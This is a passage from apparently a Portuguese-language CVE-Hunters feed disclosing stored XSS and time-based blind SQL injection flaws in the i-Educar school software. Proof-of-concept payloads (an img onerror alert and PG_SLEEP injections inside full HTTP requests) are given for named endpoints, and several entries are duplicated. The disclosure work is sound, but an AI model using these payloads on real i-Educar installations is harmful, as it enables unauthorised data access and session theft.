validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>nm_tipo</code> e <code>descricao</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9722/image.png" width="584" height="257" srcset="/p/cve-2025-9722/image_hu_c8cf46eb6b050b41.png 480w, /p/cve-2025-9722/image_hu_f1b1f0088f0fff87.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="227" data-flex-basis="545px" /></p> <p><img src="/p/cve-2025-9722/image-1.png" width="551" height="217" srcset="/p/cve-2025-9722/image-1_hu_8154a177a690938.png 480w, /p/cve-2025-9722/image-1_hu_7bd166c5469b1b4a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="253" data-flex-basis="609px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9722.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9722.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 31 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9723/ https://www.cvehunters.com/pt/p/cve-2025-9723/ <h2 id="cve-2025-9723-cross-site-scripting-xss-armazenado-no-endpoint-educar_tipo_regime_cadphp-parâmetro-nm_tipo">CVE-2025-9723: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_tipo_regime_cad.php</code> parâmetro <code>nm_tipo</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9723" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9723</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_tipo_regime_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nm_tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_tipo_regime_cad.php</code></p><h2 id="cve-2025-9723-cross-site-scripting-xss-armazenado-no-endpoint-educar_tipo_regime_cadphp-parâmetro-nm_tipo">CVE-2025-9723: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_tipo_regime_cad.php</code> parâmetro <code>nm_tipo</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9723" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9723</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_tipo_regime_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nm_tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_tipo_regime_cad.php</code></p> <p>Parâmetro: <code>nm_tipo</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nm_tipo</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9723/image.png" width="579" height="228" srcset="/p/cve-2025-9723/image_hu_30ee5bc94558a46c.png 480w, /p/cve-2025-9723/image_hu_d033cd6d8b8c0c81.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="253" data-flex-basis="609px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9723.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9723.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 31 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9724/ https://www.cvehunters.com/pt/p/cve-2025-9724/ <h2 id="cve-2025-9724-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_nivel_ensino_cadphp">CVE-2025-9724: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_nivel_ensino_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9724" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9724</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>educar_nivel_ensino_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nm_nivel</code> e <code>descricao</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_nivel_ensino_cad.php</code></p><h2 id="cve-2025-9724-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-educar_nivel_ensino_cadphp">CVE-2025-9724: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_nivel_ensino_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9724" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9724</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>educar_nivel_ensino_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nm_nivel</code> e <code>descricao</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_nivel_ensino_cad.php</code></p> <p>Parâmetros:<code>nm_nivel</code> e <code>descricao</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>nm_nivel</code> e <code>descricao</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9724/image.png" width="572" height="212" srcset="/p/cve-2025-9724/image_hu_f1ad93c28c15da33.png 480w, /p/cve-2025-9724/image_hu_82e5db05c0ce4244.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="269" data-flex-basis="647px" /></p> <p><img src="/p/cve-2025-9724/image-1.png" width="572" height="223" srcset="/p/cve-2025-9724/image-1_hu_d0f78472b39dbbb3.png 480w, /p/cve-2025-9724/image-1_hu_1f1d3d37f56155fa.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="256" data-flex-basis="615px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9724.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9724.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 31 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9738/ https://www.cvehunters.com/pt/p/cve-2025-9738/ <h2 id="cve-2025-9738-cross-site-scripting-xss-armazenado-no-endpoint-educar_tipo_ensino_cadphp-parâmetro-nm_tipo">CVE-2025-9738: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_tipo_ensino_cad.php</code> parâmetro <code>nm_tipo</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9738" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9738</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_tipo_ensino_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nm_tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_tipo_ensino_cad.php</code></p><h2 id="cve-2025-9738-cross-site-scripting-xss-armazenado-no-endpoint-educar_tipo_ensino_cadphp-parâmetro-nm_tipo">CVE-2025-9738: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_tipo_ensino_cad.php</code> parâmetro <code>nm_tipo</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9738" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9738</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_tipo_ensino_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nm_tipo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_tipo_ensino_cad.php</code></p> <p>Parâmetro: <code>nm_tipo</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nm_tipo</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9738/image.png" width="582" height="226" srcset="/p/cve-2025-9738/image_hu_8e88176a8609165e.png 480w, /p/cve-2025-9738/image_hu_2cdba1b0a67e9e2a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="257" data-flex-basis="618px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9738.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9738.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 31 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9684/ https://www.cvehunters.com/pt/p/cve-2025-9684/ <h2 id="cve-2025-9684-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleformulamediaedit">CVE-2025-9684: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>/module/FormulaMedia/edit</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9684" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9684</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>/module/FormulaMedia/edit</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-9684-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleformulamediaedit">CVE-2025-9684: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>/module/FormulaMedia/edit</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9684" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9684</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>/module/FormulaMedia/edit</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>/module/FormulaMedia/edit</code></p> <p>Parâmetro: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR </span></span></code></pre></td></tr></table> </div> </div><h4 id="exemplo-de-requisição">Exemplo de Requisição </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/FormulaMedia/edit?id=1%27+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+%27WqeR%27=%27WqeR HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: [COOKIE] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.</p> <p><img src="/p/cve-2025-9684/image.png" width="1177" height="1049" srcset="/p/cve-2025-9684/image_hu_4da7a86622a45df0.png 480w, /p/cve-2025-9684/image_hu_1f080892d45bc258.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="112" data-flex-basis="269px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9684.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9684.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 30 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9685/ https://www.cvehunters.com/pt/p/cve-2025-9685/ <h2 id="cve-2025-9685-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleareaconhecimentoview">CVE-2025-9685: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>/module/AreaConhecimento/view</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9685" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9685</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>/module/AreaConhecimento/view</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-9685-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleareaconhecimentoview">CVE-2025-9685: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>/module/AreaConhecimento/view</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9685" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9685</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>/module/AreaConhecimento/view</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>/module/AreaConhecimento/view</code></p> <p>Parâmetro: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR </span></span></code></pre></td></tr></table> </div> </div><h4 id="exemplo-de-requisição">Exemplo de Requisição </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/AreaConhecimento/view?id=3'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/module/AreaConhecimento/index </span></span><span class="line"><span class="cl">Cookie: [COOKIE] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span 